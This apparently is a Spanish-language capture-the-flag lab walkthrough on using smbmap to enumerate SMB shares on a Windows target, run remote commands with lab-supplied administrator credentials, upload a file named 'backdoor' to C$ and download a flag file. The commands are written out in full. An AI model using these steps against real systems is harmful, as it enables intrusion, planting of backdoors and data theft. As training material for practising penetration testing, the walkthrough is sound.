Es una herramienta que nos permite enumerar recursos, descargar y subir archivos, con unos credenciales Mas Ejemplos: EnumSMB_smbmap
Ejemplo
Fase de reconocimiento
La version de samba con la que vamos a trabajar es v1, por ello podemos hacer con el usuario guest
Obtenemos un Listado de directorios desde la raiz ”.\”
smbmap -u guest -p "" -d . -H 10.2.28.124-u: usuario-p: password-d: Nombre de dominio, por defecto: (WORKGROUP)-H: Host
ahora probamos el mismo comando pero con los credenciales que nos ofrecen en el ejercicio
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113
ahora tenemos mas permisos como podemos observar.
smbmap nos permite ejecutar comandos desde samba vamos probar a hacer un ipconfig de forma remota (ipconfig ya que sabes que estamos atacando una maquina windows)
smbmap -u administrator -p "smbserver_771" -d C -H 10.2.22.113 -x 'ipconfig'
vemos que la ip coincide tal y como esperábamos
otro script nos muestra los recursos compartidos disponibles, pero en este caso no nos devuelve un resultado.
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113 -L
Tambien podemos hacer uso de -r para listar los recursos pero esta vez de forma recursiva
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113 -r
si queremos hacerlo de de forma mas localizada podemos establer la unidad en este caso C$
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113 -r 'C$'
Fase de explotación
smbmap permite la subida de archivos, como tentemos credenciales con permisos de escritura, vamos a hacer uso de ello.
Creamos un archivo en nuestra maquina llamado “backdoor” y lo subimos
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113 --upload "./backdoor" 'C$/backdoor'podemos comprobar que se ha subido usando el comando de antes -r 'C$'
También podemos bajar archivos, este caso bajaremos el archivo “Flag.txt”
con el comando
smbmap -u administrator -p "smbserver_771" -d . -H 10.2.22.113 --download "C$/flag.txt"